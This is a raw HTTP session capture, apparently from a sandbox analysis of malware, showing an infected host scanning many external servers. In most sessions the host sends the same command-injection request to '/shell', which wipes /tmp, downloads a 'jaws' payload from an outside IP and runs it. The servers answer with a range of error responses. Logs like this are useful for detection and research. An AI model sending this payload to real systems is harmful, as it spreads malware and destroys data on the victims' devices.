                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            174192.168.2.233629638.254.102.19380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.705239058 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:21.919965029 CET201INHTTP/1.1 200 OK
                                                            Content-Type: text/html
                                                            Pragma: no-cache
                                                            Refresh: 1; URL=http://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Connection: Close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 2f 48 54 4d 4c 3e
                                                            Data Ascii: <HTML></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            175192.168.2.2355502185.45.103.6480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.714509010 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.975574017 CET117INHTTP/1.1 500 Server Error
                                                            Content-Length: 42
                                                            Date: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Connection: close
                                                            Jan 26, 2024 15:31:41.975781918 CET54INData Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 42 61 64 20 72 65 71 75 65 73 74 3a 20 5b 47 45 54 5d
                                                            Data Ascii: Error 500: Server ErrorBad request: [GET]


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            176192.168.2.234601618.194.17.17680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.778567076 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.982435942 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            177192.168.2.2348082138.201.91.23280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.784028053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:41.993566036 CET336INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.10.3
                                                            Date: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            178192.168.2.234787018.66.222.15580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.789330959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:42.003886938 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:41 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            179192.168.2.2358524221.194.131.8780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:41.925410986 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:42.287951946 CET609INHTTP/1.1 404 Not Found
                                                            Date: Fri, 26 Jan 2024 14:31:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 144
                                                            Connection: keep-alive
                                                            Proxy-Status: 0000201404026000
                                                            x-tt-trace-host: 01f638a4b5c719e9d5169f8225650676bb9672edf57703706e053a29c1b1328b1f56fd1da9db090985ddc6f4dfdbee1724
                                                            x-tt-trace-tag: id=00;cdn-cache=miss
                                                            x-tt-trace-id: 00-2401262231424708A51D6969F615E27C-01E2D7A15838AF21-00
                                                            Server: TLB
                                                            X-TT-LOGID: 202401262231424708A51D6969F615E27C
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 54 4c 42 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>TLB</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            180192.168.2.2355534185.45.103.6480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:42.224526882 CET117INHTTP/1.1 500 Server Error
                                                            Content-Length: 48
                                                            Date: Fri, 26 Jan 2024 14:31:42 GMT
                                                            Connection: close
                                                            Jan 26, 2024 15:31:42.224664927 CET60INData Raw: 45 72 72 6f 72 20 35 30 30 3a 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 43 6c 69 65 6e 74 20 63 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e
                                                            Data Ascii: Error 500: Server ErrorClient closed connection


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            181192.168.2.2353116156.244.93.14380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:43.590528011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:43.923326969 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            182192.168.2.2340780146.148.208.21380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:43.740161896 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.549585104 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:45.477468014 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:47.301208973 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:51.012713909 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:58.439682007 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:13.025590897 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:42.205502033 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            183192.168.2.2333044173.29.24.18780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:43.748280048 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            184192.168.2.233809845.157.202.2680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:43.792134047 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:43.990605116 CET443INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:43 GMT
                                                            Server: Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.8
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            185192.168.2.233570044.211.68.17380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:43.857382059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:43.974749088 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 26 Jan 2024 14:31:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            186192.168.2.2343836148.139.122.14480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:43.859827042 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:43.979957104 CET313INHTTP/1.1 400 Bad Request
                                                            Server: snow_adc
                                                            Date: Fri, 26 Jan 2024 14:31:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 153
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 73 6e 6f 77 5f 61 64 63 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>snow_adc</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            187192.168.2.2343612103.51.145.5180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:43.888362885 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.183206081 CET451INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:43 GMT
                                                            Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m mod_fcgid/2.3.9a
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            188192.168.2.2339856204.174.66.8980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:43.968492031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.146672010 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:43 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            189192.168.2.235972223.215.23.3080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.065851927 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.274122953 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:44 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:44 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 34 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 30 34 26 23 34 36 3b 32 66 32 38 35 64 39 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;84f01002&#46;1706279504&#46;2f285d9a</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            190192.168.2.233694680.211.121.12480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:44.072128057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:44.287792921 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:44 GMT
                                                            Server: Apache/2.4.56 (Debian)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
